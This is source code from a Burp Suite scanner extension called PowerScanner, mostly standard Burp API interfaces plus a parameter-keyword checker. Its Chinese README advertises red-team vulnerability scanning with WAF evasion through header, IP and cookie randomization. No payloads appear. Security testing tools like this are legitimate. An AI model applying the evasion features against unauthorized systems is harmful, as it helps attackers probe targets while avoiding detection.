| import java.util.List; 15 | 16 | /** 17 | * Extensions can implement this interface and then call 18 | * IBurpExtenderCallbacks.registerContextMenuFactory() to register 19 | * a factory for custom context menu items. 20 | */ 21 | public interface IContextMenuFactory 22 | { 23 | /** 24 | * This method will be called by Burp when the user invokes a context menu 25 | * anywhere within Burp. The factory can then provide any custom context 26 | * menu items that should be displayed in the context menu, based on the 27 | * details of the menu invocation. 28 | * 29 | * @param invocation An object that implements the 30 | * IContextMenuInvocation interface, which the extension can 31 | * query to obtain details of the context menu invocation. 32 | * @return A list of custom menu items (which may include sub-menus, 33 | * checkbox menu items, etc.) that should be displayed. Extensions may 34 | * return 35 | * null from this method, to indicate that no menu items are 36 | * required. 37 | */ 38 | List createMenuItems(IContextMenuInvocation invocation); 39 | } 40 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/GUI/PowerTab.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.GUI; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import burp.IBurpExtenderCallbacks; 5 | import burp.ITab; 6 | 7 | import javax.swing.*; 8 | import javax.swing.event.ChangeEvent; 9 | import java.awt.*; 10 | import java.util.Objects; 11 | 12 | public class PowerTab implements ITab { 13 | public PowerPannel PowerPannel = new PowerPannel(); 14 | Integer tabIndex; 15 | JTabbedPane tabPane; 16 | IBurpExtenderCallbacks callbacks; 17 | public PowerTab(IBurpExtenderCallbacks callbacks) { 18 | this.callbacks = callbacks; 19 | // Global.interactionServer = new InteractionServer(callbacks); 20 | // Global.interactionServer.start(); 21 | } 22 | 23 | public void findTab() { 24 | if(tabIndex != null) { 25 | return; 26 | } 27 | tabPane = (JTabbedPane) PowerPannel.getParent(); 28 | if(tabPane == null) { 29 | return; 30 | } 31 | for(int i = 0; i < tabPane.getTabCount(); i++) { 32 | if(Objects.equals(tabPane.getTitleAt(i), getTabCaption())) { 33 | tabIndex = i; 34 | } 35 | } 36 | tabPane.addChangeListener((ChangeEvent e1) -> { 37 | if(tabPane.getSelectedIndex() == tabIndex) { 38 | tabPane.setBackgroundAt(tabIndex, Color.BLACK); 39 | } 40 | }); 41 | } 42 | 43 | void alertTab() { 44 | tabPane.setBackgroundAt(tabIndex, new Color((float) 0.894, (float) 0.535, (float) 0.0)); 45 | } 46 | 47 | @Override 48 | public String getTabCaption() { 49 | return "PowerScanner"; 50 | } 51 | 52 | @Override 53 | public PowerPannel getUiComponent() { 54 | return PowerPannel; 55 | } 56 | 57 | } 58 | -------------------------------------------------------------------------------- /src/main/java/burp/IScannerInsertionPointProvider.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerInsertionPointProvider.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * Extensions can implement this interface and then call 16 | * IBurpExtenderCallbacks.registerScannerInsertionPointProvider() 17 | * to register a factory for custom Scanner insertion points. 18 | */ 19 | public interface IScannerInsertionPointProvider 20 | { 21 | /** 22 | * When a request is actively scanned, the Scanner will invoke this method, 23 | * and the provider should provide a list of custom insertion points that 24 | * will be used in the scan. Note: these insertion points are used in 25 | * addition to those that are derived from Burp Scanner's configuration, and 26 | * those provided by any other Burp extensions. 27 | * 28 | * @param baseRequestResponse The base request that will be actively 29 | * scanned. 30 | * @return A list of 31 | * IScannerInsertionPoint objects that should be used in the 32 | * scanning, or 33 | * null if no custom insertion points are applicable for this 34 | * request. 35 | */ 36 | List getInsertionPoints( 37 | IHttpRequestResponse baseRequestResponse); 38 | } 39 | -------------------------------------------------------------------------------- /src/main/java/burp/IIntruderPayloadGeneratorFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGeneratorFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadGeneratorFactory() 15 | * to register a factory for custom Intruder payloads. 16 | */ 17 | public interface IIntruderPayloadGeneratorFactory 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload generator. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use extension-generated payloads. 23 | * 24 | * @return The name of the payload generator. 25 | */ 26 | String getGeneratorName(); 27 | 28 | /** 29 | * This method is used by Burp when the user starts an Intruder attack that 30 | * uses this payload generator. 31 | * 32 | * @param attack An 33 | * IIntruderAttack object that can be queried to obtain details 34 | * about the attack in which the payload generator will be used. 35 | * @return A new instance of 36 | * IIntruderPayloadGenerator that will be used to generate 37 | * payloads for the attack. 38 | */ 39 | IIntruderPayloadGenerator createNewInstance(IIntruderAttack attack); 40 | } 41 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerHttpListener() to register an 15 | * HTTP listener. The listener will be notified of requests and responses made 16 | * by any Burp tool. Extensions can perform custom analysis or modification of 17 | * these messages by registering an HTTP listener. 18 | */ 19 | public interface IHttpListener 20 | { 21 | /** 22 | * This method is invoked when an HTTP request is about to be issued, and 23 | * when an HTTP response has been received. 24 | * 25 | * @param toolFlag A flag indicating the Burp tool that issued the request. 26 | * Burp tool flags are defined in the 27 | * IBurpExtenderCallbacks interface. 28 | * @param messageIsRequest Flags whether the method is being invoked for a 29 | * request or response. 30 | * @param messageInfo Details of the request / response to be processed. 31 | * Extensions can call the setter methods on this object to update the 32 | * current message and so modify Burp's behavior. 33 | */ 34 | void processHttpMessage( 35 | int toolFlag, 36 | boolean messageIsRequest, 37 | IHttpRequestResponse messageInfo); 38 | } 39 | -------------------------------------------------------------------------------- /src/main/java/burp/IMessageEditorTabFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorTabFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMessageEditorTabFactory() to 15 | * register a factory for custom message editor tabs. This allows extensions to 16 | * provide custom rendering or editing of HTTP messages, within Burp's own HTTP 17 | * editor. 18 | */ 19 | public interface IMessageEditorTabFactory 20 | { 21 | /** 22 | * Burp will call this method once for each HTTP message editor, and the 23 | * factory should provide a new instance of an 24 | * IMessageEditorTab object. 25 | * 26 | * @param controller An 27 | * IMessageEditorController object, which the new tab can query 28 | * to retrieve details about the currently displayed message. This may be 29 | * null for extension-invoked message editors where the 30 | * extension has not provided an editor controller. 31 | * @param editable Indicates whether the hosting editor is editable or 32 | * read-only. 33 | * @return A new 34 | * IMessageEditorTab object for use within the message editor. 35 | */ 36 | IMessageEditorTab createNewInstance( 37 | IMessageEditorController controller, 38 | boolean editable); 39 | } 40 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanSensitiveParam.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | import burp.*; 4 | 5 | import java.util.ArrayList; 6 | import java.util.List; 7 | 8 | public class ScanSensitiveParam extends Reporter { 9 | protected IBurpExtenderCallbacks callbacks; 10 | protected IExtensionHelpers helpers; 11 | protected String[] sensitiveWords = new String[]{ 12 | "file", "down", "path", "template", 13 | "order", "desc", "limit", "table", 14 | "@type" 15 | }; 16 | 17 | public ScanSensitiveParam(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 18 | super(callbacks, helpers); 19 | this.callbacks = callbacks; 20 | this.helpers = helpers; 21 | } 22 | 23 | public List doScanSensitiveParam(IHttpRequestResponse baseRequestResponse) { 24 | List issues = new ArrayList<>(); 25 | List params = helpers.analyzeRequest(baseRequestResponse).getParameters(); 26 | for (IParameter param : params){ 27 | String word = searchSensitiveWords(param.getName()); 28 | if (!word.equals("")) { 29 | issues.add(reporter( 30 | "Sensitive word found in param.", 31 | String.format("param: %s
" + 32 | "Contains sensitive word: %s
" + 33 | "This sensitive param maybe vulnerable" 34 | , 35 | param.getName(), 36 | word 37 | ), 38 | "Information", 39 | "Firm", 40 | baseRequestResponse 41 | )); 42 | } 43 | } 44 | return issues; 45 | } 46 | 47 | private String searchSensitiveWords(String param) { 48 | for (String word : sensitiveWords) { 49 | if (param.toLowerCase().contains(word)) { 50 | return word; 51 | } 52 | } 53 | return ""; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/DO/UserLogin.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.DO; 17 | 18 | /** 19 | * Title: UserLogin 20 | * Descrption: UserLogin DO 21 | * Date:2019-06-07 16:13 22 | * Email:woo0nise@gmail.com 23 | * Company:www.j2ee.app 24 | * @author R4v3zn 25 | * @version 1.0.0 26 | */ 27 | public class UserLogin { 28 | 29 | /** 30 | * this is FOFA Pro email 31 | */ 32 | private String email; 33 | 34 | /** 35 | * this is FOFA Pro key 36 | */ 37 | private String key; 38 | 39 | /** 40 | * Constructor 41 | * @param email user email 42 | * @param key user key 43 | */ 44 | public UserLogin(String email, String key) { 45 | this.email = email; 46 | this.key = key; 47 | } 48 | 49 | public String getEmail() { 50 | return email; 51 | } 52 | 53 | public String getKey() { 54 | return key; 55 | } 56 | 57 | public void setEmail(String email) { 58 | this.email = email; 59 | } 60 | 61 | public void setKey(String key) { 62 | this.key = key; 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /src/main/java/burp/IIntruderPayloadProcessor.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadProcessor.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerIntruderPayloadProcessor() to 15 | * register a custom Intruder payload processor. 16 | */ 17 | public interface IIntruderPayloadProcessor 18 | { 19 | /** 20 | * This method is used by Burp to obtain the name of the payload processor. 21 | * This will be displayed as an option within the Intruder UI when the user 22 | * selects to use an extension-provided payload processor. 23 | * 24 | * @return The name of the payload processor. 25 | */ 26 | String getProcessorName(); 27 | 28 | /** 29 | * This method is invoked by Burp each time the processor should be applied 30 | * to an Intruder payload. 31 | * 32 | * @param currentPayload The value of the payload to be processed. 33 | * @param originalPayload The value of the original payload prior to 34 | * processing by any already-applied processing rules. 35 | * @param baseValue The base value of the payload position, which will be 36 | * replaced with the current payload. 37 | * @return The value of the processed payload. This may be 38 | * null to indicate that the current payload should be skipped, 39 | * and the attack will move directly to the next payload. 40 | */ 41 | byte[] processPayload( 42 | byte[] currentPayload, 43 | byte[] originalPayload, 44 | byte[] baseValue); 45 | } 46 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpRequestResponseWithMarkers.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponseWithMarkers.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used for an 16 | * IHttpRequestResponse object that has had markers applied. 17 | * Extensions can create instances of this interface using 18 | * IBurpExtenderCallbacks.applyMarkers(), or provide their own 19 | * implementation. Markers are used in various situations, such as specifying 20 | * Intruder payload positions, Scanner insertion points, and highlights in 21 | * Scanner issues. 22 | */ 23 | public interface IHttpRequestResponseWithMarkers extends IHttpRequestResponse 24 | { 25 | /** 26 | * This method returns the details of the request markers. 27 | * 28 | * @return A list of index pairs representing the offsets of markers for the 29 | * request message. Each item in the list is an int[2] array containing the 30 | * start and end offsets for the marker. The method may return 31 | * null if no request markers are defined. 32 | */ 33 | List getRequestMarkers(); 34 | 35 | /** 36 | * This method returns the details of the response markers. 37 | * 38 | * @return A list of index pairs representing the offsets of markers for the 39 | * response message. Each item in the list is an int[2] array containing the 40 | * start and end offsets for the marker. The method may return 41 | * null if no response markers are defined. 42 | */ 43 | List getResponseMarkers(); 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/CustomScanIssue.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import burp.IHttpRequestResponse; 4 | import burp.IHttpService; 5 | import burp.IScanIssue; 6 | 7 | import java.net.URL; 8 | 9 | public class CustomScanIssue implements IScanIssue { 10 | private IHttpService httpService; 11 | private URL url; 12 | private IHttpRequestResponse[] httpMessages; 13 | private String name; 14 | private String detail; 15 | private String severity; 16 | private String confidence; 17 | 18 | public CustomScanIssue( 19 | IHttpService httpService, 20 | URL url, 21 | IHttpRequestResponse[] httpMessages, 22 | String name, 23 | String detail, 24 | String severity, 25 | String confidence) { 26 | this.httpService = httpService; 27 | this.url = url; 28 | this.httpMessages = httpMessages; 29 | this.name = name; 30 | this.detail = detail; 31 | this.severity = severity; 32 | this.confidence = confidence; 33 | } 34 | 35 | @Override 36 | public URL getUrl() { 37 | return url; 38 | } 39 | 40 | @Override 41 | public String getIssueName() { 42 | return name; 43 | } 44 | 45 | @Override 46 | public int getIssueType() { 47 | return 0; 48 | } 49 | 50 | @Override 51 | public String getSeverity() { 52 | return severity; 53 | } 54 | 55 | @Override 56 | public String getConfidence() { 57 | return confidence; 58 | } 59 | 60 | @Override 61 | public String getIssueBackground() { 62 | return null; 63 | } 64 | 65 | @Override 66 | public String getRemediationBackground() { 67 | return null; 68 | } 69 | 70 | @Override 71 | public String getIssueDetail() { 72 | return detail; 73 | } 74 | 75 | @Override 76 | public String getRemediationDetail() { 77 | return null; 78 | } 79 | 80 | @Override 81 | public IHttpRequestResponse[] getHttpMessages() { 82 | return httpMessages; 83 | } 84 | 85 | @Override 86 | public IHttpService getHttpService() { 87 | return httpService; 88 | } 89 | 90 | } -------------------------------------------------------------------------------- /src/main/java/burp/IIntruderPayloadGenerator.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderPayloadGenerator.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for custom Intruder payload generators. Extensions 14 | * that have registered an 15 | * IIntruderPayloadGeneratorFactory must return a new instance of 16 | * this interface when required as part of a new Intruder attack. 17 | */ 18 | public interface IIntruderPayloadGenerator 19 | { 20 | /** 21 | * This method is used by Burp to determine whether the payload generator is 22 | * able to provide any further payloads. 23 | * 24 | * @return Extensions should return 25 | * false when all the available payloads have been used up, 26 | * otherwise 27 | * true. 28 | */ 29 | boolean hasMorePayloads(); 30 | 31 | /** 32 | * This method is used by Burp to obtain the value of the next payload. 33 | * 34 | * @param baseValue The base value of the current payload position. This 35 | * value may be 36 | * null if the concept of a base value is not applicable (e.g. 37 | * in a battering ram attack). 38 | * @return The next payload to use in the attack. 39 | */ 40 | byte[] getNextPayload(byte[] baseValue); 41 | 42 | /** 43 | * This method is used by Burp to reset the state of the payload generator 44 | * so that the next call to 45 | * getNextPayload() returns the first payload again. This 46 | * method will be invoked when an attack uses the same payload generator for 47 | * more than one payload position, for example in a sniper attack. 48 | */ 49 | void reset(); 50 | } 51 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerScanner 2 | * 面向HW的红队半自动扫描器(Burp插件) 3 | * 适合有经验的渗透测试人员。 4 | 5 | * 注:误报率高!!!所有报告结果需经手动手动确认。 6 | * By Brian.W AKA BigCHAN 7 | 8 | ## Features 9 | * 通过缩短payload长度、降低发包数量提高对WAF的隐蔽性,同时提高误报率。 10 | * 所有测试项不依赖回显,发现隐蔽漏洞 11 | * BypassWAF:各种Headers随机化(IP随机化、Cookie清空、User-agent随机化、HOST随机化) 12 | * BypassWAF:锚点随机化,随机锚点{{|RANDOMSTR|}},{{|RANDOMINT|}} 13 | * BypassWAF:json unicode编码 14 | 15 | ## Check list 16 | 注意:所有检测项只包含无害化PoC,不包含利用程序 17 | * 扫描Sql注入 18 | * 扫描命令注入 19 | * 扫描敏感文件 20 | * 扫描路径穿越 21 | * 报告敏感参数(参数明看起来可能是漏洞点) 22 | * fastjson检测 23 | * log4j检测 24 | * 路由请求到第三方工具,比如xray、zaproxy 25 | 26 | ## TODO 27 | * 不增加发报量的前提下,修改对照逻辑,降低误报率 28 | * 敏感文件扫描按照目录扫描(最高遍历一级目录) 29 | * BypassWAF:膨胀Post body 30 | * BypassWAF:膨胀Get URL 31 | * CMS识别 32 | 33 | 34 | # How To Use 35 | 加载插件,设置主动在线扫描,打开浏览器,设置代理到burp,剩下的就是点点点就行了。 36 | 37 | ## 主动扫描 38 | * (optional) 为了控制发包数目,防止被WAF封,取消勾选其他所有主动扫描插件 39 | * 加载插件 40 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/loadext.png) 41 | * 新建在线主动扫描 42 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan1.jpg) 43 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan2.png) 44 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan3.png) 45 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan4.png) 46 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan5.png) 47 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/livescan6.png) 48 | 49 | ## Bypass WAF 50 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/BypassWAF1.png) 51 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/BypassWAF2.png) 52 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/BypassWAF3.png) 53 | 54 | ## 扫描结果 55 | ![image](https://raw.githubusercontent.com/usualwyy/PowerScanner/master/images/report1.png) -------------------------------------------------------------------------------- /src/main/java/burp/ICookie.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ICookie.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.Date; 13 | 14 | /** 15 | * This interface is used to hold details about an HTTP cookie. 16 | */ 17 | public interface ICookie 18 | { 19 | /** 20 | * This method is used to retrieve the domain for which the cookie is in 21 | * scope. 22 | * 23 | * @return The domain for which the cookie is in scope. Note: For 24 | * cookies that have been analyzed from responses (by calling 25 | * IExtensionHelpers.analyzeResponse() and then 26 | * IResponseInfo.getCookies(), the domain will be 27 | * null if the response did not explicitly set a domain 28 | * attribute for the cookie. 29 | */ 30 | String getDomain(); 31 | 32 | /** 33 | * This method is used to retrieve the path for which the cookie is in 34 | * scope. 35 | * 36 | * @return The path for which the cookie is in scope or null if none is set. 37 | */ 38 | String getPath(); 39 | 40 | /** 41 | * This method is used to retrieve the expiration time for the cookie. 42 | * 43 | * @return The expiration time for the cookie, or 44 | * null if none is set (i.e., for non-persistent session 45 | * cookies). 46 | */ 47 | Date getExpiration(); 48 | 49 | /** 50 | * This method is used to retrieve the name of the cookie. 51 | * 52 | * @return The name of the cookie. 53 | */ 54 | String getName(); 55 | 56 | /** 57 | * This method is used to retrieve the value of the cookie. 58 | * @return The value of the cookie. 59 | */ 60 | String getValue(); 61 | } 62 | -------------------------------------------------------------------------------- /src/main/java/burp/IMessageEditorController.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMessageEditorController.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used by an 14 | * IMessageEditor to obtain details about the currently displayed 15 | * message. Extensions that create instances of Burp's HTTP message editor can 16 | * optionally provide an implementation of 17 | * IMessageEditorController, which the editor will invoke when it 18 | * requires further information about the current message (for example, to send 19 | * it to another Burp tool). Extensions that provide custom editor tabs via an 20 | * IMessageEditorTabFactory will receive a reference to an 21 | * IMessageEditorController object for each tab instance they 22 | * generate, which the tab can invoke if it requires further information about 23 | * the current message. 24 | */ 25 | public interface IMessageEditorController 26 | { 27 | /** 28 | * This method is used to retrieve the HTTP service for the current message. 29 | * 30 | * @return The HTTP service for the current message. 31 | */ 32 | IHttpService getHttpService(); 33 | 34 | /** 35 | * This method is used to retrieve the HTTP request associated with the 36 | * current message (which may itself be a response). 37 | * 38 | * @return The HTTP request associated with the current message. 39 | */ 40 | byte[] getRequest(); 41 | 42 | /** 43 | * This method is used to retrieve the HTTP response associated with the 44 | * current message (which may itself be a request). 45 | * 46 | * @return The HTTP response associated with the current message. 47 | */ 48 | byte[] getResponse(); 49 | } 50 | -------------------------------------------------------------------------------- /src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import BrianW.AKA.BigChan.GUI.PowerTab; 4 | import BrianW.AKA.BigChan.Handlers.*; 5 | import BrianW.AKA.BigChan.Tools.Config; 6 | import BrianW.AKA.BigChan.Tools.Global; 7 | 8 | import java.util.List; 9 | 10 | public class BurpExtender implements IBurpExtender { 11 | @Override 12 | public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) { 13 | // keep a reference to our callbacks object 14 | // 15 | // implement IBurpExtender 16 | // 17 | // obtain an extension helpers object 18 | 19 | Global.config = new Config(callbacks); 20 | Global.PowerTab = new PowerTab(callbacks); 21 | callbacks.addSuiteTab(Global.PowerTab); 22 | IExtensionHelpers helpers = callbacks.getHelpers(); 23 | // set our extension name 24 | callbacks.setExtensionName("PowerScanner by Brian.W"); 25 | // register ourselves as a custom scanner check 26 | IScannerCheck PerRequestScans = new PerRequestHandler(callbacks, helpers); 27 | IScannerCheck PerHostScans = new PerHostHandler(callbacks, helpers); 28 | ISessionHandlingAction SessionHandler = new SessionHandler(callbacks, helpers); 29 | IExtensionStateListener StateHandler = new StateHandler(callbacks, helpers); 30 | IProxyListener requesthandler = new RequestHandler(callbacks, helpers); 31 | callbacks.registerScannerCheck(PerRequestScans); 32 | callbacks.registerScannerCheck(PerHostScans); 33 | callbacks.registerSessionHandlingAction(SessionHandler); 34 | callbacks.registerExtensionStateListener(StateHandler); 35 | callbacks.registerProxyListener(requesthandler); 36 | callbacks.printOutput("PowerScanner by Brian.W"); 37 | callbacks.printOutput("Start scanner!"); 38 | // List ScannerChecks = callbacks.getScannerChecks(); 39 | // for (IScannerCheck ScannerCheck: ScannerChecks){ 40 | // callbacks.printOutput(ScannerCheck.toString()); 41 | // } 42 | } 43 | } -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/HitRst.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | public class HitRst { 4 | private int cdoe; 5 | private String compareWithNegative_Same; 6 | private String compareWithNegative_Diff; 7 | private String compareWithPositive_Same; 8 | private String compareWithPositive_Diff; 9 | 10 | 11 | public HitRst( 12 | int hitCode, 13 | String compareWithNegative_Diff, 14 | String compareWithNegative_Same, 15 | String compareWithPositive_Diff, 16 | String compareWithPositive_Same 17 | ) { 18 | this.cdoe = hitCode; 19 | this.compareWithNegative_Same = compareWithNegative_Same; 20 | this.compareWithNegative_Diff = compareWithNegative_Diff; 21 | this.compareWithPositive_Diff = compareWithPositive_Diff; 22 | this.compareWithPositive_Same = compareWithPositive_Same; 23 | } 24 | 25 | public int getCdoe() { 26 | return cdoe; 27 | } 28 | 29 | public String getCompareWithPositive_Same() { 30 | return compareWithPositive_Same; 31 | } 32 | 33 | public String getCompareWithPositive_Diff() { 34 | return compareWithPositive_Diff; 35 | } 36 | 37 | public HitRst setCompareWithPositive_Same(String compareWithPositive_Same) { 38 | this.compareWithPositive_Same = compareWithPositive_Same; 39 | return this; 40 | } 41 | 42 | public HitRst setCompareWithPositive_Diff(String compareWithPositive_Diff) { 43 | this.compareWithPositive_Diff = compareWithPositive_Diff; 44 | return this; 45 | } 46 | 47 | public void setCdoe(int cdoe) { 48 | this.cdoe = cdoe; 49 | } 50 | 51 | public String getCompareWithNegative_Same() { 52 | return compareWithNegative_Same; 53 | } 54 | 55 | public HitRst setCompareWithNegative_Same(String compareWithNegative_Same) { 56 | this.compareWithNegative_Same = compareWithNegative_Same; 57 | return this; 58 | } 59 | 60 | public String getCompareWithNegative_Diff() { 61 | return compareWithNegative_Diff; 62 | } 63 | 64 | public HitRst setCompareWithNegative_Diff(String compareWithNegative_Diff) { 65 | this.compareWithNegative_Diff = compareWithNegative_Diff; 66 | return this; 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /src/main/java/burp/IResponseKeywords.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IResponseKeywords.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface is used to represent the counts of keywords appearing in a 16 | * number of HTTP responses. 17 | */ 18 | public interface IResponseKeywords 19 | { 20 | 21 | /** 22 | * This method is used to obtain the list of keywords whose counts vary 23 | * between the analyzed responses. 24 | * 25 | * @return The keywords whose counts vary between the analyzed responses. 26 | */ 27 | List getVariantKeywords(); 28 | 29 | /** 30 | * This method is used to obtain the list of keywords whose counts do not 31 | * vary between the analyzed responses. 32 | * 33 | * @return The keywords whose counts do not vary between the analyzed 34 | * responses. 35 | */ 36 | List getInvariantKeywords(); 37 | 38 | /** 39 | * This method is used to obtain the number of occurrences of an individual 40 | * keyword in a response. 41 | * 42 | * @param keyword The keyword whose count will be retrieved. 43 | * @param responseIndex The index of the response. Note responses are 44 | * indexed from zero in the order they were originally supplied to the 45 | * IExtensionHelpers.analyzeResponseKeywords() and 46 | * IResponseKeywords.updateWith() methods. 47 | * @return The number of occurrences of the specified keyword for the 48 | * specified response. 49 | */ 50 | int getKeywordCount(String keyword, int responseIndex); 51 | 52 | /** 53 | * This method is used to update the analysis based on additional responses. 54 | * 55 | * @param responses The new responses to include in the analysis. 56 | */ 57 | void updateWith(byte[]... responses); 58 | } 59 | -------------------------------------------------------------------------------- /src/main/java/burp/ISessionHandlingAction.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ISessionHandlingAction.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerSessionHandlingAction() to 15 | * register a custom session handling action. Each registered action will be 16 | * available within the session handling rule UI for the user to select as a 17 | * rule action. Users can choose to invoke an action directly in its own right, 18 | * or following execution of a macro. 19 | */ 20 | public interface ISessionHandlingAction 21 | { 22 | /** 23 | * This method is used by Burp to obtain the name of the session handling 24 | * action. This will be displayed as an option within the session handling 25 | * rule editor when the user selects to execute an extension-provided 26 | * action. 27 | * 28 | * @return The name of the action. 29 | */ 30 | String getActionName(); 31 | 32 | /** 33 | * This method is invoked when the session handling action should be 34 | * executed. This may happen as an action in its own right, or as a 35 | * sub-action following execution of a macro. 36 | * 37 | * @param currentRequest The base request that is currently being processed. 38 | * The action can query this object to obtain details about the base 39 | * request. It can issue additional requests of its own if necessary, and 40 | * can use the setter methods on this object to update the base request. 41 | * @param macroItems If the action is invoked following execution of a 42 | * macro, this parameter contains the result of executing the macro. 43 | * Otherwise, it is 44 | * null. Actions can use the details of the macro items to 45 | * perform custom analysis of the macro to derive values of non-standard 46 | * session handling tokens, etc. 47 | */ 48 | void performAction( 49 | IHttpRequestResponse currentRequest, 50 | IHttpRequestResponse[] macroItems); 51 | } 52 | -------------------------------------------------------------------------------- 